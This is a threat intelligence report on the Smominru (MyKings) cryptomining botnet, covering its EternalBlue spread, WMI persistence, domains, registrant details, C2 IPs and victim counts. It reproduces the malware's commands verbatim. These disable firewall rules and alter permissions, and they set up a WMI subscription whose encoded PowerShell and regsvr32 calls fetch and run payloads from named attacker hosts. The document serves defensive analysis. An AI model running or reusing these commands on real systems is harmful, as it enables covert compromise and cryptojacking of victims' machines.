X-Industry

Summary

Beginning in August of 2017, a new cryptocurrency mining botnet, dubbed Smominru, started propagating via the recently leaked Eternal Blue exploit. Smominru, aka MyKings, is characterized by the targeting of Windows systems using WMI as a file-less persistence mechanism.[1]

As of March 2019, Smominru showed no signs of slowing down.  Wapack Labs has identified approximately 316K victims connecting to Smominru infrastructure over a period of 6 days.  This report provides a high-level overview on the malware installation as well as details on the Smominru infrastructure and botnet.

Details

After the leak of NSA developed exploits in 2017, several attackers incorporated them into malware campaigns.  One of these came to be known as Smominru, a self-propagating botnet intended primarily for cryptocurrency mining.  Smominru uses the Eternal Blue exploit[2] to infect systems and install a WMI payload. This payload triggers a number of additional commands and payload downloads including the cryptocurrency miner as well as Mimikatz, a popular info stealer malware.

Along with the WMI payload, Smominru then executes a large number of commands on the victim in order to prep the system.  Among these are commands for killing processes and services, changing access rights and reconfiguring the firewall. [1]  Example commands:

taskkill /f /im help.exe /im doc001.exe /im dhelllllper.exe /im DOC001.exe /im dhelper.exe /im conime.exe /im a.exe /im docv8.exe /im king.exe /im name.exe /im doc.exe…

 

netsh advfirewall firewall delete rule name="tcp all" dir=in

netsh advfirewall firewall delete rule name="deny tcp 445" dir=in

netsh advfirewall firewall delete rule name="deny tcp 139" dir=in

netsh advfirewall firewall delete rule name="tcpall" dir=out

 

cacls C:\Windows\debug\WIA\*.exe /e /d everyone&cacls C:\Users\asp\AppData\Roaming\Tempo\*.exe /e /d everyone&cacls C:\Users\administrator\AppData\Roaming\Tempo /e /d everyone&cacls C:\Users\asp\AppData\Roaming\Tempo\*.exe /e /d system&cacls C:\Users\Default\AppData\Roaming\Tempo\*.exe

 

The malware uses the WMI console commands (WMIC) to trigger additional downloads.

 

wmic /NAMESPACE:"\\root\subscription" PATH __EventFilter CREATE Name="fuckyoumm3", EventNameSpace="root\cimv2",QueryLanguage="WQL", Query="SELECT * FROM __InstanceModificationEvent WITHIN 10800 WHERE TargetInstance ISA 'Win32_PerfFormattedData_PerfOS_System'"&wmic /NAMESPACE:"\\root\subscription" PATH CommandLineEventConsumer CREATE Name="fuckyoumm4", CommandLineTemplate="cmd /c powershell.exe -nop -enc \"JAB3AGMAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ADsAJAB3AGMALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAOgAvAC8AdwBtAGkALgAxADIAMQA3AGIAeQBlAC4AaABvAHMAdAAvADIALgB0AHgAdAAnACkALgB0AHIAaQBtACgAKQAgAC0AcwBwAGwAaQB0ACAAJwBbAFwAcgBcAG4AXQArACcAfAAlAHsAJABuAD0AJABfAC4AcwBwAGwAaQB0ACgAJwAvACcAKQBbAC0AMQBdADsAJAB3AGMALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACQAXwAsACAAJABuACkAOwBzAHQAYQByAHQAIAAkAG4AOwB9AA==\"&powershell.exe IEX (New-Object system.Net.WebClient).DownloadString('http://wmi.1217bye.host/S.ps1')&powershell.exe IEX (New-Object system.Net.WebClient).DownloadString('http://173.208.139.170/s.txt')&powershell.exe IEX (New-Object system.Net.WebClient).DownloadString('http://35.182.171.137/s.jpg')||regsvr32 /u /s /i:http://wmi.1217bye.host/1.txt scrobj.dll&regsvr32 /u /s /i:http://173.208.139.170/2.txt scrobj.dll&regsvr32 /u /s /i:http://35.182.171.137/3.txt scrobj.dll"&wmic /NAMESPACE:"\\root\subscription" PATH __FilterToConsumerBinding CREATE Filter="__EventFilter.Name=\"fuckyoumm3\"", Consumer="CommandLineEventConsumer.Name=\"fuckyoumm4\""

 

This also achieves persistence via configuration of an event filter named ‘fuckyoumm3’, which runs every 10800 seconds.  This is also a convenient way for the attacker to install additional malware on all of the bots since they can switch out the hosted files. The Monero mining malware is finally installed, makes a connection to pool.minexmr.com to retrieve its configuration and begin mining.

Infrastructure

Smominru has used a number of different endpoints since it emerged in 2017.  Its current network consists of a handful of IP addresses and domains.  Most of the known domains share the same registrant email: billkillmenow@gmail.com.  Domains use the same loose naming convention consisting of a combination of words and numbers.  A couple domains use the string ‘mykings’ which is an alias name for Smominru.  The domains use the Reg.ru registrar as well as the following state and country configurations:

Registrant State/Province: msk

Registrant Country: BF

 

Several other domains use a registrant email address ira.malikova78@mail.ru.  The Smominru actors tried to obfuscate this email by using Whois protection services however, it was identified by examining historic Whois records prior to the Whois protection.

The following is an example Whois record:

Domain Name: 1217BYE.HOST

Registry Domain ID: D87766657-CNIC

Registrar WHOIS Server: whois.reg.ru

Registrar URL: https://www.reg.ru/

Updated Date: 2018-12-21T17:13:05.0Z

Creation Date: 2018-12-16T17:08:54.0Z

Registry Expiry Date: 2019-12-16T23:59:59.0Z

Registrar: Registrar of Domain Names REG.RU, LLC

Registrar IANA ID: 1606

Domain Status: ok https://icann.org/epp#ok

Registrant Organization:

Registrant State/Province: msk

Registrant Country: BF

Registrant Phone: +7.4957654321

Registrant Email: billkillmenow@gmail.com

Admin Phone: +7.4957654321

Admin Email: billkillmenow@gmail.com

Tech Phone: +7.4957654321

Tech Email: billkillmenow@gmail.com

Name Server: NS1.REG.RU

Name Server: NS2.REG.RU

DNSSEC: unsigned

Billing Phone: +7.4957654321

Billing Email: billkillmenow@gmail.com

Registrar Abuse Contact Email: abuse@reg.ru

Registrar Abuse Contact Phone: +7.4955801111

URL of the ICANN Whois Inaccuracy Complaint Form: https://www.icann.org/wicf/

>>> Last update of WHOIS database: 2019-03-25T16:38:02.0Z <<<

 

The following table lists domains that are currently registered by Smominru actors.

 

VALUE

Created

Registration info

1217bye.host

 2018-12-16

billkillmenow@gmail.com

1226bye.pw

 2018-12-26

billkillmenow@gmail.com

1226bye.xyz

 2018-12-25

billkillmenow@gmail.com

5b6b7b.info

 2017-01-21

billkillmenow@gmail.com

down0116.info

 2018-01-16

billkillmenow@gmail.com

ftp0118.info

 2018-01-18

billkillmenow@gmail.com

ftp0930.host

 2018-09-30

billkillmenow@gmail.com

ms1128.site

 2018-11-28

billkillmenow@gmail.com

mykings.pw

 2018-04-11

Protected Whois. Initially observed registrant: ira.malikova78@mail.ru

mykings.xyz

 

sinkholed

mys2018.xyz

 2018-03-23

Registrant State/Province: msk

Registrant Country: BF

Reg.ru

pc0416.xyz

 2018-04-16

Registrar URL: http://www.reg.com

 

Registrant State/Province: msk

Registrant Country: BF

wpd0126.info

 

Registrant State/Province: msk

Registrant Country: BF

Reg.ru

upme0611.info

 2018-06-10

Registrant State/Province: msk

Registrant Country: BF

Reg.ru

649183ca17.pw

2018-09-03

 

ira.malikova78@mail.ru

 

8e627797f3.pw

2018-09-03

 

ira.malikova78@mail.ru

 

 

Wapack Labs identified 10 IP addresses currently being leveraged for Smominru’s command and control infrastructure.  IP address 174.128.230.162, which is currently being leveraged for 2nd stage downloads, was by far the most frequently observed with close to 300K unique IPs connecting.

Smominru C2 IP

Botnet Hits

174.128.230.162

295230

45.58.135.106

69871

174.128.239.250

21202

66.117.6.174

1313

35.182.171.137

1107

64.32.3.186

1094

185.112.156.92

1088

223.25.247.240

511

173.208.139.170

353

208.110.71.194

316

 

 

Botnet

Wapack Labs analyzed traffic going to Smominru infrastructure over the course of 6 days and identified 316K unique IPs that are likely compromised with the Smominru coinminer. The vast majority were AS4134 No.31, Jin-rong Street which is the top botnet ASN across the board.

 

 

The geolocation of Smominru bots, revealed China and Russia to be the top two origins, with roughly the same number of bots each.  Figure 3. shows the breakdown of bots by country.

 

 

Conclusion

 

Cryptocurrency mining botnets such a Smominru are especially problematic because not only can they lead to data loss, they also consume most of the processing power on an infected system.  This also leads to more power consumption and greatly degrades the performance of the infected machine.  Despite emergency patches issued by Microsoft, millions of systems still remained vulnerable to Eternal Blue, as of late 2018.  So long as machines are unpatched, they are at risk of being recruited by Smominru.

[1] https://www.virustotal.com/#/file/85aded78821dafa60971ce19201bea3f34bbadb64b81ef882b406f8312abfa4a/detection

 

[1] https://blog.trendmicro.com/trendlabs-security-intelligence/cryptocurrency-miner-uses-wmi-eternalblue-spread-filelessly/

[2] https://en.wikipedia.org/wiki/EternalBlue

E-mail me when people leave their comments –

You need to be a member of Red Sky Alliance to add comments!

Join Red Sky Alliance